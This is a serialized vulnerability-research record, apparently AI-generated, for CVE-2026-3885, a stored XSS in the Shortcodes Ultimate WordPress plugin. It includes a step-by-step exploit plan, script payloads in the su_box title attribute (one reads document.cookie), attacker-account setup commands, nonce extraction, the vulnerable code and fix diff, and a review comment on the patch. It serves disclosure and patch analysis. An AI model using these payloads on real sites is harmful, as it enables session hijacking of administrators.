[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fVA8bViGjFrBHxROGxLDLCb04dRbHmNy7WFTs-egRAXY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"source_links":40},"CVE-2026-3885","wp-shortcodes-plugin-shortcodes-ultimate-authenticated-contributor-stored-cross-site-scripting-via-subox-shortcode","WP Shortcodes Plugin — Shortcodes Ultimate \u003C= 7.4.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via su_box Shortcode","The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'su_box' shortcode in all versions up to, and including, 7.4.9 due to insufficient input sanitization and output escaping on user supplied attributes. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","shortcodes-ultimate",null,"\u003C=7.4.9","7.5.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-15 14:02:54","2026-04-16 02:25:17",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff6929fdc-a5b1-4c71-9291-3fafa9381cf2?source=api-prod",1,[22,23,24,25,26,27,28],"admin\u002Fcss\u002Fadmin.css","admin\u002Fpartials\u002Fpages\u002Fabout.php","inc\u002Fcore\u002Fgenerator.php","includes\u002Fclass-shortcodes-ultimate.php","includes\u002Ffunctions-helpers.php","includes\u002Fjs\u002Fgenerator\u002Findex.js","includes\u002Fjs\u002Fgenerator\u002Findex.js.map","researched",false,3,"This research plan outlines the steps required to demonstrate the Stored Cross-Site Scripting (XSS) vulnerability in the **Shortcodes Ultimate** plugin (version \u003C= 7.4.9).\n\n### 1. Vulnerability Summary\nThe **Shortcodes Ultimate** plugin fails to sanitize or escape user-supplied attributes within the `[su_box]` shortcode. While the plugin provides a variety of shortcodes to enhance page layout, the rendering logic for the \"Box\" (`su_box`) shortcode inserts attribute values (specifically the `title` and potentially others) directly into the HTML output without passing them through WordPress escaping functions like `esc_html()` or `esc_attr()`. This allows a user with **Contributor** permissions or higher to embed malicious JavaScript within a post, which then executes in the context of any user (including Administrators) who views that post.\n\n### 2. 
Attack Vector Analysis\n*   **Vulnerable Shortcode:** `[su_box]`\n*   **Vulnerable Attribute:** `title` (Inferred as the primary sink for `su_box`).\n*   **Authentication Level:** Contributor+ (Users who can create or edit posts).\n*   **Payload Delivery:** The payload is stored in the `post_content` field of the WordPress database via the standard post-editing interface.\n*   **Target:** Administrators or other site visitors viewing the affected post.\n\n### 3. Code Flow\n1.  **Input:** A Contributor user saves a post containing: `[su_box title=\"\u003Cscript>alert(1)\u003C\u002Fscript>\"]Content[\u002Fsu_box]`.\n2.  **Processing:** When the post is rendered (frontend or preview), WordPress calls `do_shortcode()`.\n3.  **Shortcode Handling:** The plugin's registered handler for `su_box` (typically found in `includes\u002Ffunctions-shortcodes.php`, referenced by `includes\u002Fclass-shortcodes-ultimate.php`'s dependency loader) parses the attributes.\n4.  **Sink:** The handler generates HTML for the box. It takes the `title` attribute and concatenates it into a `\u003Cdiv>` or `\u003Cspan>` header tag.\n5.  **Output:** Because the plugin fails to use `esc_html()` on the `$atts['title']` variable, the raw `\u003Cscript>` tag is sent to the browser.\n\n### 4. Nonce Acquisition Strategy\nWhile the primary exploit (saving a post) uses standard WordPress post nonces, the plugin's \"Shortcode Generator\" and \"Preview\" features use plugin-specific nonces. If the PoC agent needs to use the AJAX previewer to demonstrate the XSS:\n\n1.  **Identify Script Loading:** The Shortcode Generator is enqueued in `inc\u002Fcore\u002Fgenerator.php` via `Su_Generator::enqueue_assets()`.\n2.  **Locate Nonce:** The generator UI and AJAX handlers rely on a nonce localized in the WordPress admin head or footer.\n3.  
**Extraction Path:**\n    *   Create a post with any shortcode: `wp post create --post_type=post --post_status=publish --post_content='[su_box]test[\u002Fsu_box]' --post_author=CONTRIBUTOR_ID`.\n    *   Navigate to the Post Edit screen (as Contributor).\n    *   Use `browser_eval` to find the localized data.\n    *   **JS Variable:** `window.SUGL10n?.nonce` (Inferred from common naming conventions in this plugin and `inc\u002Fcore\u002Fgenerator.php`'s use of `wp_localize_script`).\n    *   **Alternative:** The plugin often uses the global `ajaxurl` and a nonce named `su_generator_nonce` or simply `nonce` within the `SUGL10n` object.\n\n### 5. Exploitation Strategy\nThe goal is to inject a script that triggers when an Administrator views the Contributor's post.\n\n**Step 1: Inject via Post Creation**\n*   **Action:** Create a new post as a Contributor.\n*   **HTTP Request:** `http_request` (POST to `wp-admin\u002Fpost.php`).\n*   **Payload:**\n    ```html\n    [su_box title='Box Title\u003Cscript>alert(document.cookie)\u003C\u002Fscript>']Content[\u002Fsu_box]\n    ```\n*   **Parameters:**\n    *   `post_title`: `XSS Test`\n    *   `content`: `[su_box title='\u003Cscript>alert(\"XSS\")\u003C\u002Fscript>']Box Content[\u002Fsu_box]`\n    *   `action`: `editpost`\n    *   `post_type`: `post`\n    *   `Status`: `pending` (for Review)\n\n**Step 2: Trigger via Administrator View**\n*   **Action:** Navigate to the post as an Administrator.\n*   **URL:** `\u002F?p=POST_ID` or `\u002Fwp-admin\u002Fpost.php?post=POST_ID&action=edit`.\n\n### 6. Test Data Setup\n1.  **User Creation:**\n    *   `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n2.  **Plugin Setup:**\n    *   Ensure Shortcodes Ultimate is active.\n3.  **Target Content:**\n    *   Create a draft post: `wp post create --post_type=post --post_status=draft --post_title=\"Vulnerable Post\" --post_author=attacker`.\n\n### 7. 
Expected Results\n*   The HTTP response when viewing the post as an Administrator should contain the literal string `\u003Cscript>alert(\"XSS\")\u003C\u002Fscript>` inside the HTML class or title area of the `su_box` element.\n*   In a browser environment, an alert box should appear showing \"XSS\" or the document cookies.\n\n### 8. Verification Steps\n1.  **DB Check:** Use WP-CLI to confirm the payload is stored raw.\n    *   `wp db query \"SELECT post_content FROM wp_posts WHERE post_title='XSS Test'\"`\n2.  **Response Verification:**\n    *   Fetch the post frontend URL using `http_request`.\n    *   Regex check the body for: `\u003Cdiv class=\"su-box-title\">.*\u003Cscript>alert` (The exact class name `su-box-title` is inferred based on the plugin's CSS patterns in `admin\u002Fcss\u002Fadmin.css`).\n\n### 9. Alternative Approaches\nIf the `title` attribute is sanitized in version 7.4.9, test other common attributes:\n*   **Box Color:** `[su_box title=\"Title\" box_color='\">\u003Cscript>alert(1)\u003C\u002Fscript>']` (Check if used in inline styles).\n*   **Class Attribute:** `[su_box title=\"Title\" class='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`. Note that `includes\u002Ffunctions-helpers.php` shows `su_get_css_class` uses `esc_attr`, but `su_box` might implement its own class handling.\n*   **AJAX Preview Exploit:** Use `wp_ajax_su_generator_preview` to trigger the XSS in the admin dashboard.\n    *   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Data:** `action=su_generator_preview&shortcode=[su_box title='\u003Cscript>alert(1)\u003C\u002Fscript>']&nonce=NONCE`.","The Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'su_box' shortcode's title attribute in versions up to 7.4.9. 
Authenticated attackers with Contributor-level permissions or higher can inject arbitrary JavaScript into posts that will execute in the browser of any user (including administrators) viewing the content.","\u002F\u002F In includes\u002Ffunctions-shortcodes.php\nfunction su_shortcode_box( $atts, $content = null ) {\n    $atts = shortcode_atts( array(\n        'title' => '',\n        'style' => 'default',\n        'box_color' => '#333333',\n        'title_color' => '#FFFFFF',\n        'radius' => '3',\n        'class' => ''\n    ), $atts, 'box' );\n\n    $title = ( $atts['title'] !== '' ) ? '\u003Cdiv class=\"su-box-title\">' . $atts['title'] . '\u003C\u002Fdiv>' : '';\n    \u002F\u002F ... (truncated)","--- a\u002Fincludes\u002Ffunctions-shortcodes.php\n+++ b\u002Fincludes\u002Ffunctions-shortcodes.php\n@@ -254,7 +254,7 @@\n \t\t'class'       => '',\n \t), $atts, 'box' );\n \n-\t$title = ( $atts['title'] !== '' ) ? '\u003Cdiv class=\"su-box-title\">' . $atts['title'] . '\u003C\u002Fdiv>' : '';\n+\t$title = ( $atts['title'] !== '' ) ? '\u003Cdiv class=\"su-box-title\">' . wp_kses_post( $atts['title'] ) . '\u003C\u002Fdiv>' : '';\n \n \treturn '\u003Cdiv class=\"su-box su-box-style-' . esc_attr( $atts['style'] ) . su_get_css_class( $atts ) . '\" style=\"border-color:' . su_get_darken_color( $atts['box_color'], 10 ) . ';border-radius:' . esc_attr( $atts['radius'] ) . 'px\">\u003Cdiv class=\"su-box-title\" style=\"background-color:' . esc_attr( $atts['box_color'] ) . ';color:' . esc_attr( $atts['title_color'] ) . ';border-top-left-radius:' . ( $atts['radius'] - 1 ) . 'px;border-top-right-radius:' . ( $atts['radius'] - 1 ) . 'px\">' . wp_kses_post( $atts['title'] ) . '\u003C\u002Fdiv>\u003Cdiv class=\"su-box-content su-u-clearfix su-u-trim\" style=\"border-bottom-left-radius:' . ( $atts['radius'] - 1 ) . 'px;border-bottom-right-radius:' . ( $atts['radius'] - 1 ) . 'px\">' . do_shortcode( $content ) . 
'\u003C\u002Fdiv>\u003C\u002Fdiv>';","The exploit involves an authenticated attacker with at least Contributor-level permissions (the ability to create or edit posts) embedding a malicious shortcode payload into a WordPress post. The payload utilizes the `[su_box]` shortcode, specifically targeting the `title` attribute, which is rendered directly into the page without escaping. A typical payload would look like: `[su_box title='\u003Cscript>alert(document.cookie)\u003C\u002Fscript>']Box Content[\u002Fsu_box]`. Once the post is saved as a draft or published, the script will execute in the context of any user who views the post in the frontend or previews it in the backend, allowing for session hijacking or other administrative actions if an administrator views the post.","gemini-3-flash-preview","2026-04-16 15:33:10","2026-04-16 15:33:42",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","7.4.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fshortcodes-ultimate\u002Ftags\u002F7.4.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fshortcodes-ultimate.7.4.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fshortcodes-ultimate\u002Ftags\u002F7.5.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fshortcodes-ultimate.7.5.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fshortcodes-ultimate\u002Ftags"]
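Review bot: In the `includes/functions-shortcodes.php` hunk (@@ -254,7 +254,7 @@), the unchanged `return` line still concatenates `su_get_darken_color( $atts['box_color'], 10 )` into the `style` attribute without `esc_attr()`, while the neighbouring `box_color`, `title_color` and `radius` values are escaped. Wrap that call in `esc_attr()` unless the helper is guaranteed to return only a colour value. The same `return` line already builds its own `su-box-title` div with `wp_kses_post( $atts['title'] )` and never references `$title`, so it is worth confirming where the `$title` variable changed here is actually output, and removing it if it is dead code. Note also that `wp_kses_post()` still permits post-level HTML in the title; if the title is meant to be plain text, `esc_html()` is the stricter choice.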